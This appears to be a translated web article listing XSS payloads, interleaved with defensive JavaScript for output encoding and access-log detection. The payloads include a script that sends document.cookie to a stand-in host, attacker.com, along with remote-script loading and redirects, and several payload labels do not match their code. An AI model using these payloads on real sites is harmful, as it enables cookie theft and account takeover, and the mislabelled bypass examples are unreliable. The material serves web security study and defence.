A collection of XSS (cross-site scripting) attack techniques

XSS (Cross-Site Scripting) is a common web security vulnerability. An attacker injects malicious script code into a trusted website so that other users' browsers execute it, which achieves the attacker's goal. XSS attacks typically occur in web applications with insecure input validation and output encoding.

XSS attacks can be divided into three main types:

Stored XSS: The attacker stores the malicious script on the server of the target website; when other users visit the page containing it, the script executes. This type is common on websites that persist user input, such as message boards, forums, and blogs. For example, an attacker inserts a malicious script in a forum comment, and when other users view the comment, the script executes in their browsers.

Reflected XSS: The attacker constructs a link containing a malicious script and tricks users into clicking it. When the user clicks the link, the script is sent to the target website's server, returned to the user's browser in the server's response, and then executed. This type is common where user input is passed through URL parameters. For example, an attacker constructs a link whose URL parameter contains a script that executes in the user's browser when the link is clicked.

DOM-based XSS: This type does not involve sending the malicious script to the server; instead, client-side JavaScript modifies the DOM of the page in a way that performs the malicious operation. The attack exploits client-side code that handles URL parameters or other user-controllable data directly. For example, a website uses JavaScript to read URL parameters and insert them straight into the page; without proper filtering and encoding, an attacker can trigger malicious behaviour by constructing the URL parameters.
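The defensive counterpart to all three types above is the same: encode every untrusted value for the exact context it lands in (HTML text, attribute value, JavaScript string literal) and allowlist the scheme of any URL before it reaches href or src. The following JavaScript is an added example, not code from the original article; the function names, the comment template and the placeholder base origin https://example.com/ are this example's own assumptions.

```javascript
// Added example (not from the original article): context-aware output
// encoding plus URL scheme allowlisting, the two checks that neutralise the
// payload classes listed on this page.

// Characters that can open a tag, close an attribute or start an entity.
// Encoding them means "<script>", "<img onerror=...>" and friends are shown
// as literal text instead of being parsed as markup.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Encode for an HTML text node or a quoted attribute value.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Encode for a JavaScript string literal inside a <script> block or inline
// handler. Everything outside [A-Za-z0-9] becomes \xHH or \uHHHH, so a value
// can neither terminate the literal nor smuggle in a "</script>" tag.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Allowlist the scheme of a URL destined for href/src. The WHATWG URL parser
// lower-cases the scheme and strips leading whitespace and embedded
// tab/newline characters itself, so no hand-rolled normalisation is needed
// before the comparison.
const SAFE_PROTOCOLS = new Set(['http:', 'https:']);

// base is an assumed placeholder origin used only to resolve relative URLs.
function isSafeUrl(raw, base = 'https://example.com/') {
  let parsed;
  try {
    parsed = new URL(String(raw), base);
  } catch (e) {
    return false; // unparseable input is never emitted into markup
  }
  return SAFE_PROTOCOLS.has(parsed.protocol);
}

// Render one untrusted comment into a fixed template, encoding each value
// for the context it lands in: attribute, text node, and JS string literal.
function renderComment({ author, body, homepage }) {
  const href = isSafeUrl(homepage) ? encodeForHtml(homepage) : '#';
  return (
    '<div class="comment">' +
    '<a href="' + href + '">' + encodeForHtml(author) + '</a>' +
    '<p>' + encodeForHtml(body) + '</p>' +
    '<script>var author = "' + encodeForJsString(author) + '";</script>' +
    '</div>'
  );
}

// Stand-alone run on constructed input: the page's basic payloads come back
// as inert text and the javascript: homepage is replaced by '#'.
console.log(renderComment({
  author: 'Mallory<script>',
  body: "<img src=x onerror=alert('XSS')>",
  homepage: "javascript:alert('XSS')",
}));
```

Note the three encoders are not interchangeable: HTML entity encoding does nothing inside a `<script>` block, and a JavaScript string escape does nothing in an attribute, so the template must pick the encoder per slot rather than applying one filter to all input.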

The following are the various types of payloads.

Basic:

<script>alert('XSS')</script>

Bypass using HTML comments:

<!--><script>alert('XSS')</script>-->

Use JavaScript event handlers:

<img src="x" onerror="alert('XSS')">

Using the JavaScript URL pseudo-protocol:

<a href="javascript:alert('XSS')">Click Me</a>

Using inline JavaScript code:

<a href="javascript:void(0)" onclick="alert('XSS')">Click Me</a>

Use HTML entity encoding:

<script>alert(&#x27;XSS&#x27;)</script>

Use the onerror event of the img tag:

<img src="invalid" onerror="alert('XSS')">

Using an SVG image:

<svg/onload=alert('XSS')>

Using CSS expressions:

<div style="background-image: expression(alert('XSS'));">

Bypass filtering with special character encoding:

<script>alert(String.fromCharCode(88,83,83))</script>

Using document.write():

<script>document.write('XSS')</script>

Use the eval() function to execute malicious code:

<script>eval('alert("XSS")')</script>

Bypass filtering with URL encoding:

<script>alert(/XSS/)</script>

Bypass filtering using JavaScript comments:

<script>//alert('XSS')</script>

Attack with iframe:

<iframe src="javascript:alert('XSS')"></iframe>

Use a remote script file:

<script src="http://attacker.com/malicious.js"></script>

Use the onload event of the img tag:

<img src="valid" onload="alert('XSS')">

Use the audio or video tags:

<audio src="javascript:alert('XSS')"></audio>
<video src="javascript:alert('XSS')"></video>

Take advantage of JSONP:

<script src="http://attacker.com/endpoint?callback=alert"></script>

Use the marquee tag:

<marquee onstart="alert('XSS')">Hover Me</marquee>

Use the onchange event of the input tag:

<input type="text" onchange="alert('XSS')">

Use the onmouseover event:

<div onmouseover="alert('XSS')">Hover Me</div>

Redirect using window.location:

<script>location.href='http://attacker.com';</script>

Use document.cookie to get user cookie information:

<script>alert(document.cookie)</script>

Use localStorage or sessionStorage to store malicious data:

<script>localStorage.setItem('data', 'malicious')</script>

Send data using XMLHttpRequest:

<script>
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://attacker.com/?data=' + document.cookie, true);
  xhr.send();
</script>

Use the onload event to redirect:

<script>
window.onload = function() {
  window.location.href = 'http://attacker.com';
};
</script>

Use the onsubmit event to modify form data:

<form action="/" onsubmit="document.getElementById('password').value = 'malicious'">
  <input type="password" id="password">
  <input type="submit" value="Submit">
</form>

Use the onkeyup event of the input tag:

<input type="text" onkeyup="alert('XSS')">

A javascript: URL utilizing the a tag:

<a href="javascript:window.location='http://attacker.com'">Click Me</a>

Take advantage of the textarea tag:

<textarea autofocus onfocus="alert('XSS')">Hover Me</textarea>

Take advantage of special tag attributes:

<div id="xss" data-attr="javascript:alert('XSS')"></div>
<script>document.getElementById('xss').dataset.attr</script>

Use innerHTML to modify the page content:

<script>document.body.innerHTML = 'XSS'</script>

Use the setTimeout() function to perform malicious actions:

<script>
setTimeout(function() {
  alert('XSS');
}, 1000);
</script>

Use the object or embed tags:

<object data="javascript:alert('XSS')"></object>
<embed src="javascript:alert('XSS')"></embed>

Using the Flash object:

<embed src="xss.swf">

Use HTML5’s postMessage() method:

<script>
window.postMessage('malicious', '*');
</script>

Use the url() function in CSS to perform malicious actions:

<style>
div {
  background-image: url(javascript:alert('XSS'));
}
</style>
<div></div>

Use the onhashchange event:

<script>
window.onhashchange = function() {
  alert('XSS');
};
</script>
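For the reflected variants in the list above, where the payload travels in a URL parameter, a defender can spot attempts in the web server's access log. The following Node.js script is an added example, not part of the original article: it percent-decodes each request target a bounded number of times (so a double-encoded payload is still caught), lower-cases it, and matches indicator patterns drawn from the payload classes on this page. The log lines are constructed for the example, and the indicator names are this example's own labels.

```javascript
// Added example (not from the original article): flag access-log requests
// whose target carries one of the XSS payload classes listed on this page.

// Constructed sample lines in Combined Log Format; not real traffic.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
  '203.0.113.8 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 512',
  '203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /profile?name=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 812',
  '203.0.113.10 - - [10/Oct/2023:13:55:42 +0000] "GET /go?url=javascript%3Aalert(document.cookie) HTTP/1.1" 302 0',
  '203.0.113.11 - - [10/Oct/2023:13:55:43 +0000] "GET /search?q=%253Cscript%253E HTTP/1.1" 200 512',
  '203.0.113.12 - - [10/Oct/2023:13:55:44 +0000] "POST /login HTTP/1.1" 200 128',
];

// Indicator patterns. Names are this example's own labels for the payload
// classes on the page; matching runs on the decoded, lower-cased target.
const INDICATORS = [
  { name: 'script-tag',      re: /<\s*script/ },
  { name: 'event-handler',   re: /<[^>]*[\s\/]on[a-z]+\s*=/ },
  { name: 'javascript-url',  re: /javascript\s*:/ },
  { name: 'svg-onload',      re: /<\s*svg[^>]*onload/ },
  { name: 'css-expression',  re: /expression\s*\(/ },
  { name: 'cookie-access',   re: /document\.cookie/ },
  { name: 'charcode-obfusc', re: /fromcharcode/ },
];

// Request line: method, target, protocol, inside the quoted field.
const REQUEST_RE = /"[A-Z]+ (\S+) HTTP\/[\d.]+"/;

// Decode the target the way the application eventually sees it: '+' as
// space, then percent-decoding repeated up to MAX_DECODE rounds so that
// %253C -> %3C -> < is not missed. A malformed sequence stops decoding
// rather than discarding the line.
const MAX_DECODE = 3;
function normalizeTarget(target) {
  let s = target.replace(/\+/g, ' ');
  for (let i = 0; i < MAX_DECODE; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(s);
    } catch (e) {
      break;
    }
    if (decoded === s) break;
    s = decoded;
  }
  return s.toLowerCase();
}

// Names of the indicators that fire for one raw request target.
function matchIndicators(target) {
  const norm = normalizeTarget(target);
  return INDICATORS.filter((ind) => ind.re.test(norm)).map((ind) => ind.name);
}

// Scan log lines; one finding per line that carries at least one indicator.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, idx) => {
    const m = REQUEST_RE.exec(line);
    if (!m) return; // not a request line this parser understands
    const indicators = matchIndicators(m[1]);
    if (indicators.length === 0) return;
    findings.push({ line: idx + 1, ip: line.split(' ')[0], target: m[1], indicators });
  });
  return findings;
}

// Stand-alone run over the constructed sample.
for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`line ${f.line} ${f.ip} [${f.indicators.join(',')}] ${f.target}`);
}
```

To run it over a real file, replace SAMPLE_LOG with the lines of the log read from disk. The bounded decode loop matters: a single decode pass reports line 5 as a harmless search for the literal string `%3Cscript%3E`, while the application that decodes its parameters sees a script tag.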